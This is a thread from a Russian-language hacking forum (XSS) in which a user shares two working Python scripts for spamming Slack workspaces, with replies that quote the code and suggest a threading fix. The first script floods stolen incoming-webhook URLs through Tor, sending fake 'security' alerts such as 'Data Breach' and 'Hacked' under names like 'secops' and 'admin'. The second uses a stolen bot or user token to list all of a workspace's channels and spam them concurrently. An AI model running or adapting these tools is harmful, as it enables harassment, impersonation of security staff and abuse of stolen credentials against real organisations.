• XSS.stack #1 – первый литературный журнал от юзеров форума

Slack Spammer

Отслеживать
nightly

nightly

root@usss-int:~#
Premium
Регистрация
03.10.2019
Сообщения
375
Реакции
413
Многопоточный, с рандомизацией (текст убрал), ловит сколько нужно ждать, шлёт через Tor. Реализация на коленке.

Python: 
from requests import post
from json import loads
from threading import Thread
from sys import argv
from time import sleep
from random import choice


GL_PROXY = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}
TEXT = ''


class SlackSpam:
    def __init__(self) -> None:
        self.runned = 0

        self.sent = 0
        self.locked = False
        self.usernames = (
            'admin', 'secops', 'devops', 'security', 'critical', 'ops',
            'alert', 'system', 'pentest', 'pentester', 'global', 'devs',
            'deamon', 'administrator', 'analytics', 'watchdog'
        )

    def gen_username(self) -> str:
        username = choice(self.usernames)

        if choice((True, False)):
            username += 'd'
        elif choice((True, False)):
            username = username.capitalize()
        elif choice((True, False)):
            username += '_alert'
        elif choice((True, False)):
            username += '_watch'

        return username

    def gen_title(self) -> str:
        titles = (
            'Data Breach', 'Data Leak', 'Hacked', 'Incident', 'Breach', 'Leak',
            'Security Misconfiguration', 'Problem', '!ASAP!', 'Urgent Alert',
            '!READ THIS!', 'Warning', 'Look here', 'Look at this'
        )
        title = choice(titles)

        if choice((True, False)):
            title = title.casefold()
        elif choice((True, False)):
            title = title.title()
        elif choice((True, False)):
            title = title.capitalize()

        return f'{argv[2]} {title}'

    def gen_text(self) -> str:
        return ''

    def spam(self, token: str) -> None:
        while self.locked:
            sleep(0.04)

        errors = 0

        self.locked = True
        self.runned += 1
        self.locked = False

        while True:
            data = {
                "username": self.gen_username(),
                "icon_emoji": ":sleuth_or_spy:",
                "attachments": [
                    {
                        "title": self.gen_title(),
                        "mrkdwn_in": ["text"],
                        "text": TEXT,
                        "color": choice(('red', 'black', 'blue', 'yellow', 'purple'))
                    }
                ]
            }

            try:
                resp = post(
                    token, json=data, proxies=GL_PROXY
                ).text
            except Exception as e:
                if errors == 3:
                    break

                print('Error:', e)
                errors += 1
                continue

            while self.locked:
                sleep(0.04)

            if resp != 'ok':
                if resp.startswith('{') and resp.endswith('}'):
                    resp = loads(resp)
                   
                    if resp.get('error', '') == 'rate_limited':
                        sleep(resp['retry_after'])
                        continue
                    else:
                        print(resp)
                else:
                    print(f'{token} - dead, coz: {resp}')
                    self.locked = True
                    self.runned -= 1
                    self.locked = False
                    break

            self.locked = True
            self.sent += 1
            self.locked = False

            print(f'Sent: {self.sent}; Threads: {self.runned}', end='\r')

    def start(self) -> None:
        with open(argv[1], 'r') as lines:
            for line in lines:
                if line.startswith('https://hooks.slack.com'):
                    Thread(target=self.spam, args=(line.strip(),), daemon=True).start()

        while self.runned != 0:
            sleep(1)


def main() -> None:
    if len(argv) != 3:
        print('main.py /path/to/hooks.txt "Company name"')
        exit(0)

    spammer = SlackSpam()
    spammer.start()


if __name__ == '__main__':
    main()
 
Вверху - спам через hooks, сдесь через ключ xoxb-....

Строка 78 - текст

Python: 
import asyncio
from sys import argv
from time import sleep
from json import dumps
from random import choice

from aiofiles import open as aopen
from aiohttp import ClientSession


class SlackMessages:
    def __init__(self, key: str) -> None:
        assert key.startswith('xoxb-') or key.startswith('xoxp-'), 'Key starts wrong'

        if key.startswith('xoxb-'):
            assert len(key) > 52 and len(key) < 59, 'Wrong key len'
            assert len(key.split('-')) == 4, 'Wrong struct? Must be: xoxb-D-ID-N'
        elif key.startswith('xoxp-'):
            assert len(key) > 44 and len(key) < 90, 'Wrong key len'
            assert len(key.split('-')) == 5, 'Wrong struct? Must be: xoxb-D-ID-N-N'

        print('[+] Token passed tests')

        self.ses_args = {
            'base_url': 'https://slack.com',
            'headers': {
                'Authorization': f'Bearer {key}'
            }
        }
        self.chats = {}
        self.sent = 0

    def is_critical(self, resp: dict) -> bool:
        if resp['ok']:
            return False

        critical_errors = {
            'access_denied': 'Access Dined',
            'account_inactive': 'Inactive Account',
            'deprecated_endpoint': 'Need update code',
            'method_deprecated': 'Need update request method',
            'not_authed': 'No token? Need code review',
            'token_expired': 'Token is experied... Look for new one',
            'token_revoked': 'Our token is fired...',
            'two_factor_setup_required': 'For first need setup 2FA',
            'internal_error': 'Not our bad. Internal error...',
            'service_unavailable': 'Slack unavilable',
            'invalid_post_type': 'Invalid POST type',
            'invalid_form_data': 'Invalid form data',
            'invalid_arguments': 'Invalid Arguments'
        }
        '''medium_errors = {
            'no_permission': 'User cant view this resource',
            'request_timeout': 'Request timeout'
        }'''

        invalid_resource = (
            'restricted_action', 'is_archived'
        )

        if resp['error'] in critical_errors.keys():
            print('[!!!]', critical_errors[resp['error']])
            exit(0)

        if resp['error'] == 'ratelimited':
            sleep(60)
            return False
        elif resp['error'] in invalid_resource:
            return True
        else:
            print(resp['error'])
            return True
   
    async def thread(self) -> None:
        while True:
            params = {
                'channel': choice(list(self.chats.keys())),
                'text': 'TEXTTTT'
            }
            async with ClientSession(**self.ses_args) as ses:
                try:
                    async with ses.post(
                        '/api/chat.postMessage', params=params
                    ) as r:
                        resp: dict = await r.json()
                        if not self.is_critical(resp):
                            self.sent += 1
                        else:
                            try:
                                self.chats.pop(params['channel'])
                            except Exception:
                                pass

                        print(f'Sent: {self.sent}', end='\r')
                except Exception:
                    pass
                finally:
                    await ses.close()

    async def threads(self) -> None:
        print('[!] Waiting for channels...')

        while len(self.chats.keys()) == 0:
            await asyncio.sleep(2)

        print('[+] Starting threads')

        threads = []

        for i in range(10):
            threads.append(asyncio.ensure_future(self.thread()))

        await asyncio.gather(*threads)

    async def get_chats(self):
        print('[!] Dumping chats')

        params = {
            'limit': 100,
            'cursor': ''
        }

        while True:
            async with ClientSession(**self.ses_args) as ses:
                async with ses.get(
                    '/api/conversations.list', params=params
                ) as r:
                    resp: dict = await r.json()

            params['cursor'] = resp.get(
                    'response_metadata', {}
            ).get('next_cursor', False)
            self.is_critical(resp)

            for chat in resp['channels']:
                if chat['id'] not in self.chats.keys():
                    self.chats[chat['id']] = chat['name']

            if not params['cursor']:
                break

            sleep(3)

        async with aopen('chats_ids', 'a') as saver:
            await saver.write(dumps(
            self.chats, indent=4, sort_keys=True, default=str
        ))


async def main() -> None:
    client = SlackMessages(argv[1])
    await asyncio.gather(
        asyncio.ensure_future(client.get_chats()),
        asyncio.ensure_future(client.threads())
    )


if __name__ == "__main__":
    assert len(argv) == 2, 'Forgot token.\nmain.py TOKEN'

    lp = asyncio.new_event_loop()
    lp.run_until_complete(main())
    lp.close()
 
А есть slack API или там как дискорд?
Slack cannot be accessed from your location
Based on your IP address, it looks like you are in a country or region that has been legally restricted from accessing Slack.
 
Guron_18 сказал(а):
А есть slack API или там как дискорд?
Не понял вопрос. Дискорд - никогда не юзал.
api.slack.com

Using Slack APIs

Every Slack app has access to a bag of tricks—a range of APIs that provide access to read, write, and update all kinds of data in Slack.
api.slack.com api.slack.com
 
Those self.lock
nightly сказал(а):
Multithreaded, with randomization (text removed), catches how long you need to wait, sends via Tor. Implementation on the knee.

Python: 
from requests import post
from json import loads
from threading import Thread
from sys import argv
from time import sleep
from random import choice


GL_PROXY = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}
TEXT = ''


class SlackSpam:
    def __init__(self) -> None:
        self.runned = 0

        self.sent = 0
        self.locked = False
        self.usernames = (
            'admin', 'secops', 'devops', 'security', 'critical', 'ops',
            'alert', 'system', 'pentest', 'pentester', 'global', 'devs',
            'deamon', 'administrator', 'analytics', 'watchdog'
        )

    def gen_username(self) -> str:
        username = choice(self.usernames)

        if choice((True, False)):
            username += 'd'
        elif choice((True, False)):
            username = username.capitalize()
        elif choice((True, False)):
            username += '_alert'
        elif choice((True, False)):
            username += '_watch'

        return username

    def gen_title(self) -> str:
        titles = (
            'Data Breach', 'Data Leak', 'Hacked', 'Incident', 'Breach', 'Leak',
            'Security Misconfiguration', 'Problem', '!ASAP!', 'Urgent Alert',
            '!READ THIS!', 'Warning', 'Look here', 'Look at this'
        )
        title = choice(titles)

        if choice((True, False)):
            title = title.casefold()
        elif choice((True, False)):
            title = title.title()
        elif choice((True, False)):
            title = title.capitalize()

        return f'{argv[2]} {title}'

    def gen_text(self) -> str:
        return ''

    def spam(self, token: str) -> None:
        while self.locked:
            sleep(0.04)

        errors = 0

        self.locked = True
        self.runned += 1
        self.locked = False

        while True:
            data = {
                "username": self.gen_username(),
                "icon_emoji": ":sleuth_or_spy:",
                "attachments": [
                    {
                        "title": self.gen_title(),
                        "mrkdwn_in": ["text"],
                        "text": TEXT,
                        "color": choice(('red', 'black', 'blue', 'yellow', 'purple'))
                    }
                ]
            }

            try:
                resp = post(
                    token, json=data, proxies=GL_PROXY
                ).text
            except Exception as e:
                if errors == 3:
                    break

                print('Error:', e)
                errors += 1
                continue

            while self.locked:
                sleep(0.04)

            if resp != 'ok':
                if resp.startswith('{') and resp.endswith('}'):
                    resp = loads(resp)
                  
                    if resp.get('error', '') == 'rate_limited':
                        sleep(resp['retry_after'])
                        continue
                    else:
                        print(resp)
                else:
                    print(f'{token} - dead, coz: {resp}')
                    self.locked = True
                    self.runned -= 1
                    self.locked = False
                    break

            self.locked = True
            self.sent += 1
            self.locked = False

            print(f'Sent: {self.sent}; Threads: {self.runned}', end='\r')

    def start(self) -> None:
        with open(argv[1], 'r') as lines:
            for line in lines:
                if line.startswith('https://hooks.slack.com'):
                    Thread(target=self.spam, args=(line.strip(),), daemon=True).start()

        while self.runned != 0:
            sleep(1)


def main() -> None:
    if len(argv) != 3:
        print('main.py /path/to/hooks.txt "Company name"')
        exit(0)

    spammer = SlackSpam()
    spammer.start()


if __name__ == '__main__':
    main()
Use the build in threading.LOCK() instead of self.lock.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх